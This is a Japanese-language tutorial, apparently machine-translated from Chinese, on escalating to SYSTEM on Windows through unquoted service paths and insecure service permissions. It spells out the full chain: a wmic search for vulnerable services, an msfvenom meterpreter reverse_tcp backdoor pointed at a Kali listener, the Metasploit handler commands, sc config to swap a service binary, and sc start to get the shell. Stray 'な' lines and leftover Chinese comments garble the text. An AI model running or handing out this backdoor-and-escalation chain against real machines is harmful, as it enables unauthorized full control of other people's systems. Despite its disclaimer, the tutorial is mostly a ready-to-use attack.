権限昇格: 引用符で囲まれていないサービス パス || 安全でないサービス権限。
権限昇格は権限エスカレーションと呼ばれます.オペレーティング システムはマルチユーザー オペレーティング システムであるため,ユーザーは権限制御を持ちます. たとえば, Web の脆弱性によって取得される権限は Web プロセスの権限です. 多くの場合, Web サービスは次のようなアカウントで開始されます.非常に低いアクセス許可. したがって、Webshell を介した一部の操作は制限され、管理者特権またはシステム特権に昇格する必要があります。特権は通常、オペレーティング システムの脆弱性またはオペレーティング システムの構成ミスによって、またはデータベースや FTP ソフトウェアの脆弱性などのサード パーティ ソフトウェア サービスによってエスカレートされます。
目次:
権限昇格: 引用符で囲まれていないサービス パス || 安全でないサービス権限。
ステップ 2: バックグラウンド プログラムの生成 (トロイの木馬)
ステップ 3: このプログラム (バックドア) を C ディスクのルート ディレクトリに配置します。
ステップ 4: msf をサーバーに直接インストールします。
ステップ 5: オペレーティング システムでこのサービスを再起動または有効にして、サーバーに戻ります ( kali )
ステップ 6: 権限の表示 (システム サービスがオンになっているため、SYSTEM です)
ステップ 3: プログラム サービスを再起動し、サーバーに戻ります ( kali )
ステップ 4: 権限の表示 (システム サービスがオンになっているため、SYSTEM です)
免責事項:
この記事に記載されている技術を使用して違法な攻撃を行うことは固く禁じられています。使用しない場合の結果は自己責任であり、アップロード者は一切の責任を負いません。
権力の昇格は次のように考えました。
引用符なしのサービス パスの原則:
Windows サービスの実行中は、次の 2 つのいずれかが発生します。実行可能ファイルが指定され、フル パスが引用符で囲まれている場合、文字どおりに解釈されて実行されます。ただし、サービスのバイナリ パスが引用符で囲まれていない場合、オペレーティング システムは、スペースで区切られたサービス パスの最初に見つかったインスタンスを実行します。
操作プロセス: 引用符サービス パスを検出します。パスを使用してファイルを作成し、アップロードします。サービスを有効にするか、再起動します。呼び出し後に成功します。
安全でないサービス権限の原則:
サービス パスが正しく参照されている場合でも、他の脆弱性が存在する可能性があります。たとえば、管理者の構成ミスが原因で、ユーザーがサービスに対して過剰なアクセス許可を持っている可能性があります。たとえば、ファイルを直接変更して、リダイレクトされた実行を引き起こす可能性があります。
操作プロセス: サービスのアクセス許可の構成を確認する - ファイルを作成してアップロードする - サービス パスのポイントを変更する - 呼び出し後に成功する
権限昇格: 引用符なしのサービス パス。
ステップ 1: 見積もりサービス パスを検出します。
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
ステップ 2: バックグラウンド プログラムの生成 (トロイの木馬)
バックグラウンド プログラム (トロイの木馬): https://tianyuk.blog.csdn.net/article/details/123541093
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.105
lport=4444 -f exe > program.exe
// lhost=kali的IP地址
// lport=端口号(比如4444)
// -f exe > 文件名.exe(名字要和空格前的一样)
な
な
な
ステップ 3: このプログラム (バックドア) を C ディスクのルート ディレクトリに配置します。
な
ステップ 4: msf をサーバーに直接インストールします (ここでテストするために kali に msf を直接インストールします) (2 つのサーバーが通信できる必要があります)。
msfconsole //打开 msf 命令
な
use exploit/multi/handler //加载模块
set payload windows/meterpreter/reverse_tcp
// payload 命令:(记得设置的 windows/meterpreter/reverse_tcp 要和程序的一样)
set lhost 192.168.0.105
//设置本地监听 IP(就是 kali 的 IP)命令:(记得设置的 IP 要和程序的一样)
set LPORT 4444
//设置本地监听端口(就是 kali 的 端口)命令:(记得设置的 端口 要和程序的一样)
run //执行命令
な
ステップ 5: オペレーティング システムでこのサービスを再起動または有効にして、サーバーに戻ります ( kali )
sc start "NewServiceName" //NewServiceName是服务的名字
な
ステップ 6: 権限の表示 (システム サービスがオンになっているため、SYSTEM です)
権限昇格: 安全でないサービス権限
AccessChk ファイルをダウンロードします: AccessChk - Sysinternals | Microsoft Learn
ステップ 1: このユーザーのサービス項目を検出します。
C:\Users\Administrator\Desktop\accesschk.exe -uwcqv "administrators" *
//检测这个用户(administrators)的服务项.
ステップ 2: 交換するサービスを見つけます。
sc config "NewServiceName" binpath="C:\Program.exe"
sc config "要替换的服务项名字" binpath="替换到别的程序路径"
//Program.exe一般是替换为后门木马.(自己生成一个就行,操作和上面一样)
ステップ 3: プログラム サービスを再起動し、サーバーに戻ります ( kali )
sc start "NewServiceName" //NewServiceName是服务的名字
ステップ 4: 権限の表示 (システム サービスがオンになっているため、SYSTEM です)
学習リンク: 62 日目: 権限昇格 - 腐ったジャガイモ & dll ハイジャック & パスの引用 & サービス許可_哔哩哔哩_bilibili